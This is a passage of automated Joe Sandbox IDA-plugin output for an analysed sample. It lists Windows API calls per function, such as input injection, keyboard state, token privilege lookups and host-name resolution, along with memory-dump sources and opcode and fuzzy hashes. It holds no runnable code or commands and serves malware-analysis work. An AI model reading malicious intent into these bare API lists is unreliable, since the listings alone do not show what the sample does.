                                                    • Instruction Fuzzy Hash: 6331B235A81108AEEB209A54CC8DFEC37A6EB063A0F548503FA19D61A1DF70D952BB53
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 00F7B1D2
                                                    • GetWindowRect.USER32(?,?), ref: 00F7B248
                                                    • PtInRect.USER32(?,?,00F7C6BC), ref: 00F7B258
                                                    • MessageBeep.USER32(00000000), ref: 00F7B2C9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: d98498a344395998f8410ca04d06ed9dccbcb5ccac5a38c1e19f74c664dfa21d
                                                    • Instruction ID: 4f3c33a48f4f3cafcceffd1972fc85f2a4e81f0ff8b27577dfc4c963f988bfbd
                                                    • Opcode Fuzzy Hash: d98498a344395998f8410ca04d06ed9dccbcb5ccac5a38c1e19f74c664dfa21d
                                                    • Instruction Fuzzy Hash: 71415F31A052199FDB12DF58C884BAD77F5FF4A311F1481A6E81C9B252D730E941EF52
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F51326
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F51342
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F513A8
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F513FA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 48e60d23ee9659450c8ee3f849538f903760fb54808a642be95d8e42d9931352
                                                    • Instruction ID: afe9ec454a9e4d13cff405258692ba36597d7ab4a745c0fa27821f7ee23fbd9e
                                                    • Opcode Fuzzy Hash: 48e60d23ee9659450c8ee3f849538f903760fb54808a642be95d8e42d9931352
                                                    • Instruction Fuzzy Hash: A3315930D40608AEFB308A258C15BFD7BA5BB45332F08421AEA80525D1D774A94DBB61
                                                    APIs
                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F51465
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F51481
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F514E0
                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F51532
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: cf306b753462475340976a679336a7b7ed4746a6249aa17ecc02dc9d7954e19d
                                                    • Instruction ID: f6a1c105be62becb8ab6e42db48d76fa412d6795fe55c78e6fef0c539dfe3a05
                                                    • Opcode Fuzzy Hash: cf306b753462475340976a679336a7b7ed4746a6249aa17ecc02dc9d7954e19d
                                                    • Instruction Fuzzy Hash: 0B315C31D4060C5EFF34CA659C04BFABB65BB86332F48431AEE81521D1D778A94DBB61
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F2642B
                                                    • __isleadbyte_l.LIBCMT ref: 00F26459
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F26487
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F264BD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: e66153e740d9326f05f994ad001303581753223d5bd98fb2f359472bde504e40
                                                    • Instruction ID: df3c7f180b5478793bd1c1a537c42a0fd706bf1f31cae6cdce55cb17f4613811
                                                    • Opcode Fuzzy Hash: e66153e740d9326f05f994ad001303581753223d5bd98fb2f359472bde504e40
                                                    • Instruction Fuzzy Hash: A531B031A00266AFDB21EF65EC44BBA7BA5FF40320F154569F8A4C7191DB31E990FB90
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00F7553F
                                                      • Part of subcall function 00F53B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F53B4E
                                                      • Part of subcall function 00F53B34: GetCurrentThreadId.KERNEL32 ref: 00F53B55
                                                      • Part of subcall function 00F53B34: AttachThreadInput.USER32(00000000,?,00F555C0), ref: 00F53B5C
                                                    • GetCaretPos.USER32(?), ref: 00F75550
                                                    • ClientToScreen.USER32(00000000,?), ref: 00F7558B
                                                    • GetForegroundWindow.USER32 ref: 00F75591
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: ee7eae267898c65e6029b1515f004c2cc565fdc7df84eb6e01194aa64e23be95
                                                    • Instruction ID: 20b5e1fe69b1324bc4ec25ab75490616439e08eb277526ba2187b60b2ad09f39
                                                    • Opcode Fuzzy Hash: ee7eae267898c65e6029b1515f004c2cc565fdc7df84eb6e01194aa64e23be95
                                                    • Instruction Fuzzy Hash: 34310FB190010CAFDB00EFA5DC85DEFB7F9EF94704F10406AE915E7241DA75AE449BA1
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • GetCursorPos.USER32(?), ref: 00F7CB7A
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F2BCEC,?,?,?,?,?), ref: 00F7CB8F
                                                    • GetCursorPos.USER32(?), ref: 00F7CBDC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F2BCEC,?,?,?), ref: 00F7CC16
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 704c449d100c920cfafeb1290b2f456df58af83c24ae0f8a3b35e8ae4b2ced62
                                                    • Instruction ID: 8080e4596849088542096198b8649b6917f11c2ddd6e0dc8209d1435d8421301
                                                    • Opcode Fuzzy Hash: 704c449d100c920cfafeb1290b2f456df58af83c24ae0f8a3b35e8ae4b2ced62
                                                    • Instruction Fuzzy Hash: 3B31D535600118AFCB159F98CC99EFA7BF5EB89320F14809AF9099B261C7319D50FFA1
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00F10BE2
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F57E51,?,?,00000000), ref: 00F04041
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F57E51,?,?,00000000,?,?), ref: 00F04065
                                                    • _fprintf.LIBCMT ref: 00F10C19
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00F4694C
                                                      • Part of subcall function 00F14CCA: _flsall.LIBCMT ref: 00F14CE3
                                                    • __setmode.LIBCMT ref: 00F10C4E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: 8f6aad49b644a796bd7bc2f3dbbea14187ce8a68bea175fbddb73f0f1374f81d
                                                    • Instruction ID: b306ece5d532e440f254ab619b76000989c41cd442ff61cf45282f8457f749cf
                                                    • Opcode Fuzzy Hash: 8f6aad49b644a796bd7bc2f3dbbea14187ce8a68bea175fbddb73f0f1374f81d
                                                    • Instruction Fuzzy Hash: 5611E772A041087AD708B7A4AC46AFE7B6D9F81321F140155F604A71C2DF6A69C67BE1
                                                    APIs
                                                      • Part of subcall function 00F48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F48D3F
                                                      • Part of subcall function 00F48D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D49
                                                      • Part of subcall function 00F48D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D58
                                                      • Part of subcall function 00F48D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D5F
                                                      • Part of subcall function 00F48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D75
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F492C1
                                                    • _memcmp.LIBCMT ref: 00F492E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F4931A
                                                    • HeapFree.KERNEL32(00000000), ref: 00F49321
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: a2640902c5df91e9caa72d34f7e01109f6a7b9c99758d7a437b793e7bd1ae0c3
                                                    • Instruction ID: 9a5974710821b8b27e38f2b53e30831bb87089fa2317775b86fdbeb60d006eec
                                                    • Opcode Fuzzy Hash: a2640902c5df91e9caa72d34f7e01109f6a7b9c99758d7a437b793e7bd1ae0c3
                                                    • Instruction Fuzzy Hash: F0219D32E44108EFDB10DFA4C949BFEBBB8FF45311F044059E884A7291D7B5AA05EBA0
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F763BD
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F763D7
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F763E5
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F763F3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 520cfab263eb88e00cf3c068c569640c474e76b92acf93a4089f48f7b69c2bda
                                                    • Instruction ID: 4cf4e6fc4ba4591252b65e3b25be1b1f698562f4434f5ebc9c7a7a4aa6ddf1ca
                                                    • Opcode Fuzzy Hash: 520cfab263eb88e00cf3c068c569640c474e76b92acf93a4089f48f7b69c2bda
                                                    • Instruction Fuzzy Hash: 3711E632305918AFD744AB24CC45FBA7799EF85320F188119FA1ADB3D2CB61AD00DB95
                                                    APIs
                                                      • Part of subcall function 00F4F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?), ref: 00F4F867
                                                      • Part of subcall function 00F4F858: lstrcpyW.KERNEL32(00000000,?,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4F88D
                                                      • Part of subcall function 00F4F858: lstrcmpiW.KERNEL32(00000000,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?), ref: 00F4F8BE
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E488
                                                    • lstrcpyW.KERNEL32(00000000,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E4AE
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E4E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 41c45824bd1ac8b5da25370c8eb22d8e7604ac68848a2575b831116a8e228cd3
                                                    • Instruction ID: ca79ad56df88a33d4b84adcfc7462822ce57dcae383a835717ebdca54ca3b3dd
                                                    • Opcode Fuzzy Hash: 41c45824bd1ac8b5da25370c8eb22d8e7604ac68848a2575b831116a8e228cd3
                                                    • Instruction Fuzzy Hash: D011933A500349AFDB259F24DC45DBA7BA9FF45360B40402AFC0ACB2A0EB759954E791
                                                    APIs
                                                    • _free.LIBCMT ref: 00F25331
                                                      • Part of subcall function 00F1593C: __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1593C: __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1593C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 5692c84f6f075fb9aec0abc8620894df5c32661b8150aca8818237b1cabcade8
                                                    • Instruction ID: 414bd49b3bd89338fdb83207554741153fe614d14a94cd6ce8cafd321700c3cf
                                                    • Opcode Fuzzy Hash: 5692c84f6f075fb9aec0abc8620894df5c32661b8150aca8818237b1cabcade8
                                                    • Instruction Fuzzy Hash: 1911CA32905B29AFCB207F70BC457DE37969F14BF0F105525F8489A190DE798D81BB90
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F54385
                                                    • _memset.LIBCMT ref: 00F543A6
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F543F8
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F54401
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 1a7ff7f30d7cc12f5e28f970c8b9e270f1ab216bb9f1561a057ed9afeb508d38
                                                    • Instruction ID: 78e7d2589f8a09fc7f037ee6e76be783f5f3911f9b0b76de582d4be5f4187f0d
                                                    • Opcode Fuzzy Hash: 1a7ff7f30d7cc12f5e28f970c8b9e270f1ab216bb9f1561a057ed9afeb508d38
                                                    • Instruction Fuzzy Hash: 06110471901228BAD7309BA5AC4DFEBBB7CEF45724F00419AF908E7190D6704E849BA4
                                                    APIs
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F57E51,?,?,00000000), ref: 00F04041
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F57E51,?,?,00000000,?,?), ref: 00F04065
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00F66A84
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66A8F
                                                    • _memmove.LIBCMT ref: 00F66ABC
                                                    • inet_ntoa.WSOCK32(?), ref: 00F66AC7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 06ec56492888b3badab453fad7616b3b318f407e897e9dc8b6b903954a9dc66c
                                                    • Instruction ID: ce791e32f0019199ac8ff4e5fc5e9ebfc1de29f3ea97fe35e665a44ae99e4e7f
                                                    • Opcode Fuzzy Hash: 06ec56492888b3badab453fad7616b3b318f407e897e9dc8b6b903954a9dc66c
                                                    • Instruction Fuzzy Hash: 2E1142766001089FCB00EBA4CD46DEE77B8AF04310B144165F506A72A1DF35AE04EB91
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F49719
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4972B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F49741
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4975C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 4618c226a8620cddd8977cf522b1c7641ecdd6632f874dee9e187236c51f849b
                                                    • Instruction ID: 966671435bc80d5459fa4b8593596a16783a6123f07517fbddb49931b65627dc
                                                    • Opcode Fuzzy Hash: 4618c226a8620cddd8977cf522b1c7641ecdd6632f874dee9e187236c51f849b
                                                    • Instruction Fuzzy Hash: 5B11483AA00218FFEB10DF95CD84EAEBBB8FB48710F204091E900B7290D6716E10EB90
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00EF16B4
                                                    • GetClientRect.USER32(?,?), ref: 00F2B93C
                                                    • GetCursorPos.USER32(?), ref: 00F2B946
                                                    • ScreenToClient.USER32(?,?), ref: 00F2B951
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: 7fd5eb417dd9b299944a8b3d5a2cacab6782cb8fa6e70804784d1d272a21afd3
                                                    • Instruction ID: c5c37caae3c4498ff53458de1afbafbef0fd1694442a42618aaff6357496aba7
                                                    • Opcode Fuzzy Hash: 7fd5eb417dd9b299944a8b3d5a2cacab6782cb8fa6e70804784d1d272a21afd3
